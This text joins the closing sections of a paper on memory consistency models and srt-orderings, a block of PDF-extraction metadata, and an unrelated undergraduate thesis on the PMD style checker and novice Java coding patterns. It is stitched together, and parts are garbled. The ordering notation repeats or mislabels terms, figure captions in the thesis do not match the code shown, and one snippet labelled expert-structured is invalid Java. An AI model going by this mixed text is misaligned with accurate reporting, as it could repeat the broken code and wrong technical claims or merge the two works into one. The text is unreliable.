There are two aspects of lockstep that can enforce srt-orderings. First, the srt-ordering between two operations is enforced if a lock must be passed from one to the other. For example we can enforce $srt_{vw}$ by mandating that a lock must be grabbed to perform a write. Second, locking also ensures that certain operations cannot overlap in real-time. When a write cannot overlap with a write and $srt_{vw}$ is enforced then $srt_{wr}$ is also enforced. This is because if a read $r$ returns the value of write $w$, then a write $k$ that begins after $r$ has completed must also begin after $w$ has completed. Similarly, when a write cannot overlap with a read and $srt_{wr}$
is enforced, then \( srt_r \) is enforced. This is because if a read \( r \) returns the value of write \( w \), then it must be that \( w \) completes before \( r \) begins. Therefore, a read \( m \) that begins after \( r \) has completed, must also begin after \( w \) has completed and thus will observe \( w \). Protocols often combine the two aspects of lock-step to enforce the single-writer multiple-reader invariant (SWMR) [17], where for any given object at any given time there is either a single write in progress or multiple reads. This ensures that writes must grab a lock from each other \((srt_{rw})\), reads must grab a lock from writes \((srt_{rw})\), writes cannot overlap in time \((srt_{tr})\) and writes do not overlap in time with reads \((srt_r)\).
8.2 Srt-orderings for compositionality
So far we have viewed the srt-orderings solely as a mathematical model of the protocol. However, in distributed systems, it is often necessary to describe the real-time guarantees offered by a system, in order to compose different systems. Consider the example of Zookeeper. Zookeeper does not offer linearizability, and thus multiple Zookeeper instances cannot be composed. However, researchers have found that Zookeeper does offer some real-time guarantees that can be leveraged to achieve compositionality [12].
Srt-orderings can be used to capture these real-time guarantees. For example, the precise real-time guarantees of Zookeeper are the \( srt_{rw} \) and the \( srt_{rw} \) srt-orderings and all four srt-orderings. More importantly, given this knowledge we can specify the MCM provided by composing different Zookeeper instances: the composed system will enforce the same rt-orderings as a single Zookeeper instance and thus we can use the reverse mapping from rt-orderings to sync-pats to specify the resulting MCM. In fact, we can use srt-orderings in the same spirit, to specify the MCM of any combination of composed systems, by asserting that the composed system will enforce any rt-ordering that is enforced by all of its subsystems.
9 Related Work
This work is the first to provide a mapping from MCMs to the protocols that can enforce them. To present this mapping we have used an abstract system model and the formalism presented by Alglave et al. [2] in order to describe MCMs, executions and real-time guarantees. Several works [4–6, 13, 20] have also described similar system models and formalism, but differ from our work in that they do not provide a mapping from MCMs to the protocols. Specifically, Szekeres and Zhang [20] provide a system model and a formalism called result visibility to describe consistency guarantees, including real-time guarantees. Crooks et al. [5], focusing on databases, provide a state-based formalization of isolation guarantees. Burckhardt, in his book on Eventual Consistency [4], provides a formalism to describe consistency models and protocols, with a focus on weaker guarantees. Lev-ari et al. [13] define Ordered Sequential Consistency, OSC(A), in order to specify the real-time guarantees of a protocol (with a focus on Zookeeper [9]). Similarly, Gotsman and Burckhardt propose GSC [6], a generic operational model for systems that totally order all writes, which can capture all of the srt-orderings for such systems.
In the cache coherence literature, the four program-orderings are used to describe consistency guarantees [17]. In fact, researchers have shown that when the coherence protocol enforces the single-writer multiple-reader (SWMR) invariant, the MCM depends solely on the enforced program orderings [3, 16]. Program orderings are very similar to prt-orderings with the subtle difference that program orderings carry the implication that the memory system enforces SWMR. In contrast, prt-orderings make no such assumption, allowing us to explore all possible behaviours of the memory system.
Finally, CCICheck [15] provides a way to verify an existing coherence protocol against its target MCM using the notion of \( \mu \)hb orderings, which are related to real-time. Our work...
provides a mapping from MCMs to protocols, enabling the design of minimal protocols for any MCM.
10 Conclusion
In this work, we took an important step towards actualizing our overarching vision, which is the automation of the design of protocols that are responsible to enforce the consistency model (MCM) in shared memory systems. Specifically, we argued for the need of an intermediate abstraction between the MCM and the protocol implementation, that will allow us to map the MCM to specific protocol implementation techniques. We proposed such an abstraction by mathematically modelling the protocol through eight rt-orderings. To do so, we observed that any such protocol is comprised by two gadgets: the ROB and the memory system. We mathematically abstracted the ROB with the four prt-orderings and the memory system with the four srt-orderings. Crucially, we created a mapping from consistency guarantees to the rt-orderings, such that any MCM can be translated into the minimal set of rt-orderings that are required to enforce it. Finally, we completed the picture, by relating the rt-orderings to protocol implementation techniques, paving the way for automating protocol design.
Acknowledgments
We would like to thank the anonymous reviewers for their valuable comments and Dan Sorin for the insightful discussions and valuable feedback. This work was supported in part by EPSRC grant EP/L01503X/1 to The University of Edinburgh and ARM through its PhD Scholarship Program.
References
|
{"Source-Url": "https://www.pure.ed.ac.uk/ws/files/201774773/Towards_the_Synthesis_GAVRIELATOS_DOA12032021_AFV.pdf", "len_cl100k_base": 13173, "olmocr-version": "0.1.53", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 47027, "total-output-tokens": 16074, "length": "2e13", "weborganizer": {"__label__adult": 0.0003628730773925781, "__label__art_design": 0.0005116462707519531, "__label__crime_law": 0.0003628730773925781, "__label__education_jobs": 0.00138092041015625, "__label__entertainment": 0.00011909008026123048, "__label__fashion_beauty": 0.00019371509552001953, "__label__finance_business": 0.0005459785461425781, "__label__food_dining": 0.0004467964172363281, "__label__games": 0.0007877349853515625, "__label__hardware": 0.00255584716796875, "__label__health": 0.000743865966796875, "__label__history": 0.0004727840423583984, "__label__home_hobbies": 0.00014972686767578125, "__label__industrial": 0.0006785392761230469, "__label__literature": 0.0005469322204589844, "__label__politics": 0.00041604042053222656, "__label__religion": 0.0005745887756347656, "__label__science_tech": 0.275634765625, "__label__social_life": 0.00010216236114501952, "__label__software": 0.01354217529296875, "__label__software_dev": 0.6982421875, "__label__sports_fitness": 0.0002865791320800781, "__label__transportation": 0.0008406639099121094, "__label__travel": 0.00023043155670166016}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 54236, 0.02076]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 54236, 0.4943]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 54236, 0.8631]], "google_gemma-3-12b-it_contains_pii": [[0, 1537, false], [1537, 6298, null], [6298, 11672, null], [11672, 17319, null], [17319, 21637, null], [21637, 27093, null], [27093, 32658, null], [32658, 38105, null], [38105, 43517, null], [43517, 47595, null], [47595, 54236, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1537, true], [1537, 6298, null], [6298, 11672, null], [11672, 17319, null], [17319, 21637, null], [21637, 27093, null], [27093, 32658, null], [32658, 38105, null], [38105, 43517, null], [43517, 47595, null], [47595, 54236, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 54236, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 54236, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 54236, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 54236, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 54236, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 54236, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 54236, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 54236, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 54236, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 54236, null]], "pdf_page_numbers": [[0, 1537, 1], [1537, 6298, 2], [6298, 11672, 3], [11672, 17319, 4], [17319, 21637, 5], [21637, 27093, 6], [27093, 32658, 7], [32658, 38105, 8], [38105, 43517, 9], [43517, 47595, 10], [47595, 54236, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 54236, 0.03822]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
a86ad1892eb527040f26861e3957f9327c40a793
|
ADDRESSING NOVICE CODING PATTERNS: EVALUATING AND IMPROVING A TOOL FOR CODE ANALYSIS AND FEEDBACK
Jacquelyn MacHardy Anderson (Dr. Eliane Stampfer Wiese)
School of Computing
ABSTRACT
Successful software needs maintenance over long periods of time. The original code needs to solve the problem and be maintainable. Computer science instructors at universities try to teach students in introductory classes how to write code that meets these goals. Results are inconsistent though. Readability is an important aspect of maintainability, and writing readable code requires choosing and structuring statements and expressions in a way that is idiomatic. Instructors of advanced CS courses perceive that their students frequently don’t possess or don’t engage this skill of writing with good structure. Building and evaluating this skill is complicated. Could students benefit from a tool that can identify and flag poor code structure and provide hints or suggestions on how to improve it while they program? Can a batch-processing version of the same tool help instructors quickly see and address the gaps in their students’ understanding? These questions were investigated through think-alouds with ten students as they coded in Eclipse using PMD, a code structure analysis tool and interviews with four professors who teach introductory computer science courses.
In the think-alouds, students did produce novice code structures, and the tool performed as intended in flagging these structures and providing feedback. All students were able to correctly interpret the tool’s feedback to successfully revise at least one of their initial implementations to use expert code structure. However, there is room for improvement in the tool’s feedback.
The instructor interview results showed that although instructors believe that these patterns are important for students to learn and use, assessing and giving feedback on this aspect of student code by hand does not scale well to large class sizes, so their current grading and feedback processes do not target these kinds of code structures. Instructors believe these tools have the potential to address some of these gaps and challenges. Although no instructors want to interface with the output of the batch-processing tool the way it is currently presented, all of them were interested in seeing it extended and provided input on how the tools could be extended to better meet their needs.
# TABLE OF CONTENTS
ABSTRACT .................................................................................................................. iii
LIST OF FIGURES .................................................................................................. vii
ACKNOWLEDGMENTS ............................................................................................... viii
INTRODUCTION ....................................................................................................... 1
BACKGROUND AND RELATED WORK .................................................................. 4
RESEARCH QUESTIONS .......................................................................................... 6
THINK-ALOUD METHODS ..................................................................................... 7
Participants ............................................................................................................. 7
Methods .................................................................................................................. 7
THINK-ALOUD RESULTS ....................................................................................... 9
Tool Effectiveness .................................................................................................. 10
Students Produced Patterns the Tool Should Flag and the Tool Flagged Them
Correctly ................................................................................................................ 10
Students’ Interpretations and Implementations of the Tool’s Feedback ........ 11
Usability .................................................................................................................. 14
Relationship Between Problem-Solving Approach and the Pattern Produced .... 15
Attitudes .................................................................................................................. 18
About Style .............................................................................................................. 18
About the Tool ........................................................................................................ 19
Additional Observations ......................................................................................... 19
THINK-ALOUD DISCUSSION ................................................................................. 22
Instruction Recommendations ............................................................................... 22
Tool Design Recommendations ............................................................................ 23
INTERVIEW PARTICIPANTS AND METHODS ..................................................... 24
INTERVIEW RESULTS ............................................................................................ 26
How Do Instructors Teach, Evaluate, and Give Feedback on Style? ............... 26
Instructor Opinions on Style Instruction Over the Course of the Degree ............... 28
Do Instructors Perceive that Students Use These Patterns? Does It Matter to Them?
........................................................................................................................................ 30
How Do Instructors Want to Use the Instructor-Facing Tool? ......................... 31
How do Instructors Want to Use the Student-Facing Tool? ........................... 31
INTERVIEW DISCUSSION ................................................................................................. 33
Using the Tool to Address Scalability Issues ......................................................... 33
Tool Design Recommendations ............................................................................ 35
Next Research Steps and Instructional Design Recommendations .................. 35
COMBINED DISCUSSION .............................................................................................. 38
Tool and Instructional Design Recommendations .............................................. 38
Next Research Steps ............................................................................................. 39
CONCLUSION ................................................................................................................. 41
APPENDIX: THINK-ALOUD TASKS ................................................................. 42
APPENDIX: CODING PATTERNS ............................................................................. 43
REFERENCES .............................................................................................................. 50
LIST OF FIGURES
Figure 1 An example of a coding pattern.................................................................1
Figure 2 Every issue that PMD flags in the input files becomes a row in the output table..
........................................................................................................................................3
Figure 3 PMD ’s feedback appears in the source code editor and in a separate "Violations
Outline" view in Eclipse. .....................................................................................................3
Figure 4 A novice code structure commonly produced during the isStrictlyPositive task.
................................................................................................................................................11
Figure 5 An interesting novice code structure that PMD was not programmed to detect..
................................................................................................................................................12
Figure 6 Expert-structured code with logic that matches the okNotOk Javadoc..............12
Figure 7 A common implementation of okNotOk.............................................................12
Figure 8 An interesting novice code structure that was produced by one participant during
the okNotOk task. ...............................................................................................................12
Figure 9 An interesting novice code structure that PMD was not programmed to detect..
................................................................................................................................................14
Figure 10 Expert-structured code with logic that matches the isStrictlyPositive Javadoc.
...............................................................................................................................................15
Figure 11 Participant 6 intentionally chose to assign the condition to a local variable
rather add a new if-statement. ..............................................................................................19
ACKNOWLEDGMENTS
I would like to gratefully acknowledge the support and funding I was awarded by the Undergraduate Research Opportunities Program to conduct this research.
I would like to express my deepest gratitude to Dr. Eliane Wiese for her truly stellar mentorship. I have grown so much, inspired by her example and supported at every turn by her freely given wisdom and energy. Thank you :)
I would like to thank all my professors in the School of Computing. I would like to especially thank Dr. Parker who recommended me to Dr. Wiese in the first place! I would also like to thank Jamie King for teaching me to care about code style.
I would like to humbly thank all members of the HCI Research Group and Dr. Kopta for their contributions, genuine enthusiasm, generously given time, and insightful feedback on the research.
Many thanks go to the interview and think-aloud participants and to the School of Computing staff who helped with the logistics of the interviews and think-alouds.
I would also like to thank my colleagues for the camaraderie and support throughout this journey. Special thanks go to my Senior Capstone Team!
I would like to thank my family who through their love and support and guidance smoothed out all the rough patches along the way.
Finally, I give my most heartfelt thanks to my husband. I am the lucky one.
INTRODUCTION
One important goal of writing a program is solving the programming task at hand. For novice programmers, sometimes this is the only goal [6]. On the other hand, maintaining and enhancing legacy code is far and away the dominant cost incurred during the life cycle of a successful software system [3]. Clearly, programmers must also pursue another goal: writing so that others can easily comprehend and modify the code in the future. Writing with good code structure in this sense is especially challenging for novices as their readability preferences tend to differ from experts’ preferences [12]. Research suggests that for certain coding patterns, students can comprehend both expert-structured and novice-structured programs equally well [12]. An example of a coding pattern the researchers examined is returning true or returning false instead of returning a condition directly (see Figure 1). Given that student comprehension was high for expert-structured and novice-structured code alike, Wiese et al. [12] concluded that it might be sufficient to detect novice patterns in student code and prompt the student to alter their implementation to improve its structure.
```
if (array1[index1] == array2[index2]) {
return false;
} else {
return true;
}
```
Figure 1 An example of a coding pattern. Boolean literals are returned where the condition itself could be returned instead.
One tool that could detect these kinds of patterns is PMD [5]. This tool is an Eclipse plug-in that statically analyzes Java code and flags lines of code that violate given code structure rules. This tool also has a batch processing version that is run from the command line and can process source code across multiple packages and directories. While other code structure guideline tools exist, they are not targeted to catch novice coding patterns and provide examples and suggestions in a way that is useful to a novice programmer [12]. This extended version of PMD is the tool that was used in the student think-alouds, and the batch-processing version used in the instructor interviews. See Figure 2 for an example of the output of the batch-processing version of PMD, and Figure 3 for an example of PMD’s output in Eclipse that a student would see while programming.
Figure 2 Every issue that PMD flags in the input files becomes a row in the output table. As an example, the rows highlighted in this table correspond to the flagged code structure shown in the source code in Figure 3. This example also highlights a known problem where one pattern is flagged twice because two PMD rules overlap. The CS Education Rules category represents an extension of PMD [10].
Figure 3 PMD's feedback appears in the source code editor and in a separate "Violations Outline" view in Eclipse.
BACKGROUND AND RELATED WORK
Research suggests that novices tend to find novice-structured code more readable, even though they are capable of comprehending expert-structured code and novice-structured code equally well [12]. Why do students prefer to read and write in a novice-structured way when they are capable of comprehending expert-structured code? One hypothesis that may explain this mismatch is that if students do not completely understand what their program is supposed to achieve, or perhaps they aren’t familiar enough with the language to know what data structures and functions exist that could help them solve the problem in a simpler way, then they will write code that is unidiomatic to an expert [11]. Prompting students with actionable structure feedback while they are coding could help them more effectively learn these idioms, thereby addressing at least one of the issues that leads to novice-structured code.
Wiese et al. [13] did some initial exploration of the idea that simply prompting students with suggestions or examples might be sufficient to lead them to improve the structure of a piece of code. To explore this, they prompted students to edit existing code to improve its structure. They found that despite being able to recognize expert structure for a given pattern, for example, returning a Boolean condition directly instead of checking the condition and then returning Boolean literals, many students were not able to correctly revise novice-structured code. It’s possible that editing someone else’s code (as opposed to revising one’s own code) presented a barrier.
The form and level of feedback a student needs from an IDE is not the same as what a professional programmer needs. For example, when an error message is presented from the perspective of the IDE rather than the perspective of a student (e.g. “Error: expected x but found y”), the student may face a barrier to understanding and resolving it as they may not have an accurate mental model of the process by which their code was parsed to generate that message [8]. While other structure feedback tools besides PMD (2002) do exist, such as Style Avatar [7], FrenchPress [1], Submitty [9], and StyleCop [2], they do not detect all of the common novice patterns identified by Wiese et al. [12]. Wiese et al. [12] note that many current tools either focus on typographical issues only, or they target complex, project-scale concerns that are relevant only to experienced programmers. Another tool, AutoStyle [14] is targeted to the novice programmer, but in providing feedback it does not account for novice readability preferences.
RESEARCH QUESTIONS
A main research question addressed in this thesis is: could students benefit from a tool that can identify and flag poor code structure and provide hints or suggestions on how to improve it while they program? This question was investigated through think-alouds with ten students as they coded in Eclipse using PMD, a code structure analysis tool. One goal of the think-alouds was to see how students respond to and think about PMD-style feedback. PMD’s strong customizability and extensibility make it well-suited for supporting students as it can be tailored to their specialized needs.
The other main research question addressed is: can a batch-processing version of PMD help instructors quickly see and address the gaps in their students’ understanding? This question was addressed through interviews with four professors who teach introductory computer science courses.
THINK-ALOUD METHODS
Participants
Participants were recruited from the pool of students in CS 2420 and 3500 who had previously participated in a code structure study and had agreed to be contacted via email about a follow-up study. Think-aloud participants were compensated $15 for participating for one hour.
Methods
Think-aloud participants were provided the Eclipse IDE on a Mac computer, and Eclipse already had the PMD code checker plug-in installed. The tasks were prepared ahead of time and presented as a collection of method signatures, Javadoc comments describing what the method was supposed to do, and JUnit tests. The JUnit tests were not comprehensive, meaning that a student could pass all the tests without having completely fulfilled the requirements laid out in the Javadoc comments. To begin the think aloud, students were told the task steps, which were coding, testing correctness, fixing bugs, checking style, and revising style. Students were also shown how to run the provided unit tests. Students were then provided a Java class with a method stub and instructed to implement the method according to the provided Javadoc comment. They were asked to think out loud while implementing the method as described in the Javadoc, and they were allowed to ask clarifying questions about the Javadoc as needed.
When they seemed to be finished coding, if they did not immediately run the JUnit tests themselves, they were prompted to run the tests. If the tests failed, they had to interpret the failure and resolve it. They were offered debugging assistance only if they got stuck. For example, a student who was out of ideas on how to diagnose the problem might be instructed to look at the relevant unit test or to put a breakpoint on the first line of the method and run the code in Debug mode.
When their implementation of the first method passed the unit tests, they were introduced to PMD and shown how to run it. They were told that PMD was a “style checker,” and each step of running it was explained out loud as it was run on their implementation: “Right-click on the Java file, go to PMD, and click on ‘Check Code.’” If PMD had feedback, the mouse was pointed at the in-line feedback, and the student was told that this was the feedback from PMD. For all subsequent methods that the student implemented, if they did not immediately run PMD on their code, they were prompted to run it. If PMD had no feedback but their implementation was novice-styled, they were prompted to revise their code style. If they stopped thinking out loud, they were prompted to voice their thoughts or opinions on what they were reading or doing, or they were asked to continue thinking out loud.
THINK-ALOUD RESULTS
This thesis includes analysis of two programming tasks where students were asked to implement code from scratch, test their implementation’s correctness using provided unit tests, fix bugs caught by the tests, check their code’s style using PMD, and finally revising their code’s style based on PMD’s feedback. There were additional programming tasks included in the think-aloud that are not included in the analysis in this thesis. Six students were asked to implement `isStrictlyPositive`, a method that returns true when the inputted int is positive (Appendix: Think-Aloud Tasks). This task targets the Simplify Boolean Returns pattern (Appendix: Coding Patterns). See Table 1 for a summary of PMD’s expected and actual performance on each variation of the Simplify Boolean Returns pattern.
Table 1 PMD performed as expected in detecting one version of the Simplify Boolean Returns coding pattern. Not all versions targeted were generated by participants, and one version generated by a participant was completely unanticipated.
<table>
<thead>
<tr>
<th>Simplify Boolean Returns Versions (Appendix: Coding Patterns)</th>
<th>PMD Expected Performance</th>
<th>PMD Actual Performance</th>
</tr>
</thead>
<tbody>
<tr>
<td>Version 1</td>
<td>PMD expected to detect.</td>
<td>Three participants produced. PMD did detect.</td>
</tr>
<tr>
<td>Version 2</td>
<td>PMD expected to detect.</td>
<td>No participants produced.</td>
</tr>
<tr>
<td>Version 3</td>
<td>PMD expected to detect.</td>
<td>No participants produced.</td>
</tr>
<tr>
<td>Version 4</td>
<td>Version not anticipated prior to think-aloud. PMD not programmed to detect.</td>
<td>One participant produced. PMD did not detect.</td>
</tr>
</tbody>
</table>
Of the six students who completed `isStrictlyPositive`, five were then asked to implement `okNotOk`. This is a method that returns “Ok” when the result of the first inputted int divided by the second inputted int is greater than or equal to seven and the product of the two inputted int’s is greater than or equal to one hundred twenty eight, but returns “Not Ok” otherwise. This task targets the Collapsible If Statements pattern (Appendix: Think-Aloud Tasks). See Table 2 for a summary of PMD’s expected and actual performance on each variation of the Collapsible If Statements pattern.
**Tool Effectiveness**
*Students Produced Patterns the Tool Should Flag and the Tool Flagged Them Correctly*
PMD flagged the code for Participants 1, 3, and 4 in `isStrictlyPositive` task; their code looked like Figure 4. The feedback it provided was the same for each of them: “Avoid unnecessary if..then..else statements when returning Booleans.” For the `okNotOk` task, no participants produced the nested if-statement version of the Collapsible If Statement pattern that PMD is programmed to detect.
Table 2 No students generated the targeted versions of the Collapsible If Statement pattern. One version generated by three participants was completely unanticipated.
<table>
<thead>
<tr>
<th>Collapsible If Statements Versions (Appendix: Coding Patterns)</th>
<th>PMD Expected Performance</th>
<th>PMD Actual Performance</th>
</tr>
</thead>
<tbody>
<tr>
<td>Version 1</td>
<td>PMD expected to detect.</td>
<td>No participants produced.</td>
</tr>
<tr>
<td>Version 2</td>
<td>PMD expected to detect.</td>
<td>No participants produced.</td>
</tr>
<tr>
<td>Version 3</td>
<td>Version not anticipated prior to think-aloud. PMD not programmed to detect.</td>
<td>Three participants produced. PMD did not detect.</td>
</tr>
</tbody>
</table>
Figure 4 A novice code structure commonly produced during the isStrictlyPositive task. Falls under the Simplify Boolean Returns novice pattern and was flagged by PMD.
Participants 1, 2, and 3 wrote code that looked like Figure 5 once they made their code pass the provided unit tests. This code does fall under the Collapsible If Statements pattern because the if-statements on lines 7 and 10 could be collapsed into a single if-statement, as in Figure 6. However, PMD is not yet programmed to detect this pattern the way it appeared in the students’ code, where the if-statements are consecutive.
Participants 5 and 6 initially wrote code that used good structure and was not flagged by PMD, but failed a provided unit test (see Figure 7). Participant 5 revised their code to use expert structure (similar to Figure 6). Their conditional had a bug, but it passed the provided unit tests. Participant 6 revised their code to look like Figure 8, which does not violate the Collapsible If Statement pattern and was not flagged by PMD, but still might not be considered idiomatic by experts.
Students’ Interpretations and Implementations of the Tool’s Feedback
Participants 1, 3, and 4 each received the same feedback for their initial isStrictlyPositive implementation (see Figure 4), but each of them had different interpretations of the feedback, which suggests that the current form and phrasing of the
Figure 5 An interesting novice code structure that PMD was not programmed to detect. Commonly produced during the okNotOk task. Falls under the Collapsible If Statements novice pattern and was pointed out to the student by the author.
```java
public static String okNotOk(int numTop, int numBot)
{
if (numBot == 0) {
return "Not Ok";
}
if ((numTop / numBot >= 7) && (numTop * numBot >= 128)) {
return "Ok";
}
return "Not Ok";
}
```
Figure 6 Expert-structured code with logic that matches the okNotOk Javadoc.
```java
public static String okNotOk(int numTop, int numBot)
{
if (numBot != 0 && (numTop / numBot >= 7) && (numTop * numBot >= 128)) {
return "Ok";
}
return "Not Ok";
}
```
Figure 7 A common implementation of okNotOk. Throws a DivideByZeroException when numBot is 0.
```java
public static String okNotOk(int numTop, int numBot)
{
if ((numTop / numBot >= 7) && (numTop * numBot >= 128)) {
return "Ok";
}
return "Not Ok";
}
```
Figure 8 An interesting novice code structure that was produced by one participant during the okNotOk task. Does not fall under any of the current patterns.
```java
public static String okNotOk(int numTop, int numBot)
{
boolean ok = (numBot != 0) && (numTop / numBot >= 7) && (numTop * numBot >= 128);
return ok ? "Ok" : "Not Ok";
}
```
feedback might be insufficient for a student who is unfamiliar with the code structure patterns used in this study. Participant 1 interpreted it correctly and confidently, Participant 3 interpreted correctly but was not confident, and Participant 4 interpreted it incorrectly and confidently.
Participant 1 read the PMD feedback out loud, and then stopped talking. They were asked whether they could incorporate it into a revision. They said, “Yeah, I know what you want,” indicating that PMD had successfully alerted them to the structure issue and that they understood how to revise it based on PMD’s feedback. They revised their code successfully, saying, “I can just do this in one line…”
Participant 3 read PMD’s feedback silently. Then they said, “Hmm, yeah, ok, so I could probably just do something… else to make it shorter? I don't know,” suggesting that they were unsure what the problem was but they thought the code could be shorter if they somehow removed the “unnecessary if..then..else statements.” While they revised their code, they said, “That would do… the same thing, I guess,” indicating that they were unsure about the equivalency of their new solution and their original solution.
Participant 4 read the feedback out loud and without prompting or pausing, they continued, “Ok, so then… they say uh, how do you use the ternary operator?” suggesting that they thought the problem PMD was highlighting was the use of if-else statements when the actual problem was the returning of Boolean literals where a Boolean expression would suffice. They revised their implementation to use the ternary operator (Figure 9) and then ran PMD unprompted. The feedback disappeared which was actually a false negative. PMD is not set up to detect ternary operators, but their code still exhibited the “unnecessary if.. then.. else” statements, just in compacted form.
An interesting novice code structure that PMD was not programmed to detect. Produced by one participant during the isStrictlyPositive task. Falls under the Simplify Boolean Returns pattern and was pointed out to the student by the author.
Usability
On the first task, isStrictlyPositive, participants 2, 5, and 6 received no feedback from PMD on their initial implementation. Their initial implementation (see Figure 4) exhibited expert structure. When they encountered this lack of feedback, they did not react at first, indicating that they did not realize that the tool had finished running. It was explained to them that the tool had finished running, and the lack of feedback meant that PMD had not flagged anything in their code.
On the second task, okNotOk, Participants 2 (Figure 5) and 6 (Figure 8) both ran the style checker unprompted after running the JUnit tests. When PMD showed no feedback, Participant 2 asked, “Is it done?” suggesting that even though the meaning behind the lack of feedback had been explained to them during the first task, it was still confusing to the student to see no indication that PMD had finished running. When PMD showed no feedback for Participant 6, they ran it again. When PMD still had no feedback, they said, “Well either it doesn't have any complaints or it's broken,” indicating that the lack of feedback was completely ambiguous to them, just as it was to Participant 2.
Participant 3 received feedback from PMD in the isStrictlyPositive task, and even after they modified their code to correctly addressed the style feedback (Figure 10),
```java
public static boolean isStrictlyPositive(int input)
{
return if(input > 0) ? true : false;
}
```
Figure 10 Expert-structured code with logic that matches the isStrictlyPositive Javadoc.
PMD’s feedback did not change when they ran it again. They did not react, suggesting that they were waiting for an indication that PMD had finished running. PMD had presented the same feedback because the participant had not saved their changes. This was explained to them and they saved it and ran PMD again, making the feedback disappear. The student said, “Ok, now it's ok, I think,” again suggesting that they were not completely sure what the PMD feedback or lack of feedback meant.
Relationship Between Problem-Solving Approach and the Pattern Produced
Participants 3 and 4 went back and forth between reading the Javadoc out loud and typing a small piece of their solution. For example, Participant 3 read out loud, “This method takes in a Boolean and returns an int.” The student then typed return false into the method body, saying “So, ok, I'm just going to return false so I remember,” They continued reading, “Returns true if the following condition is met, the input is positive.’ So, I'll just say if input is greater than ... so if it is positive, so zero is not technically positive, so if input is greater than zero return true.” This direct, one-to-one translation of the Javadoc into logic indicates that these participants did not have a separate planning step where they considered multiple code structures and weighed their decision before finally choosing a particular structure. Of the three participants who initially produced a
correct solution with novice structure, two coded with this oneto-one approach. Only one of the three (Participant 1) finished reading it first, saying, “Well the test is if the input is positive, so ‘if input greater than 0, return true’…” Then, examining the code and adding whitespace, they finished, “So the only other situation is to return false.” Even though they finished reading the Javadoc before they started typing, their words suggest that they were thinking of the problem as a direct translation from the Javadoc comment.
In contrast to the one-to-one approach, Participant 2 first read the Javadoc out loud from start to finish, and then started to type if(input > 0). As they were typing, they paused and said, “Well, actually, I’m rethinking this,” indicating that, even though their code was correct, they had noticed something about it that could be improved, and they understood how to make the improvement. They deleted what they had and typed return input > 0. This indicates that the student was aware of their code structure choices while they were drafting their solution; they spontaneously recognized and revised a structure issue without any external prompting. Participants 5 and 6 also produced correct, expert-structured code without feedback or prompting. They finished reading the Javadoc and then summarized it in their own words, indicating they had synthesized the meaning behind the requirements before typing their solution. For example, Participant 6 said, “Ok, so basically, literally all I’m going to do is return input strictly greater than zero.” They did hesitate when returning the Boolean expression. Participant 6 was unsure if parentheses were required, and Participant 5 was unsure whether the Boolean expression could be returned at all.
For the okNotOk task, Participants 3 and 4 coded with the same approach as before, reading a little bit of the Javadoc, typing a literal translation of what they’d read,
and repeating this cycle until they finished reading and implementing the Javadoc. Participant 1 stated that they were, “going with [their] first instincts,” suggesting that even though they finished reading the Javadoc before they started typing, they were not engaging in planning or revising steps. Participant 2 read the Javadoc out loud, then started coding, saying, “Ok, um, so I'm gonna calculate the result first, int result... well, maybe I don't need to do that. I am overthinking this,” suggesting that they were going through a planning and revising stage in their head. Only Participant 2 passed all the unit tests in their first attempt (Figure 5).
The other four participants’ initial implementations (Figure 7) failed the test that exercised their code’s handling of the case where the argument for the parameter numBot was zero. This case led to a zero in the denominator of a division operation for the participants who failed this test, causing a DivideByZeroException to be thrown, which is not aligned with the instructions in the Javadoc comment. Participant 6 read the test results and began to think out loud, planning two different potential structures for their solution, which suggests that style is important to them and that planning is an integral part of their process. Figure 8 shows Participant 6’s final implementation. Participants 1 and 3 both revised their code to look like Figure 5, and commented on their code structure as they were revising, saying, “there is probably a more efficient way to do this,” and “I don't like that this is in there twice, but... off the top of my head I can't think of a better way to do this,” suggesting that they both recognized that there were style issues but did not feel confident about addressing them before validating their code’s correctness.
Attitudes
About Style
After being prompted, Participant 2 thought out loud about the style of their okNotOk implementation (Figure 5) which used two consecutive if-statements that could have been collapsed into a single statement, a version of the Collapsible If Statement pattern, concluding, “I tend to think of error checking as its own kind of if statement and then anything that's method specific is its own if statement itself ’cause any error checking you're gonna wanna automatically return or throw an exception, so I tend to think of them in two separate realms, I guess.” This is important because it suggests that it's possible for students to develop their own structural idioms and to have a sophisticated intent behind their style choices that needs to be respected and not arbitrarily “corrected.” Along the same lines, when Participant 6 was asked how they chose one implementation over another while they were planning, they explained, “I prefer code that is more concise, and just adding this [assignment to a local variable], which is maybe 10 characters, as opposed to adding a new [statement]- the weight of a [statement] is more than the weight of characters within a [statement].” See Figure 11 for a highlighted example that calls out the assignment in the code that the student referenced. Once again, these two students’ responses together suggest that students may develop their own meaningful, structural idioms and guidelines, though the code structures they produce may look nothing alike and may not use expert structure.
Figure 11 Participant 6 intentionally chose to assign the condition to a local variable rather than add a new if-statement.
About the Tool
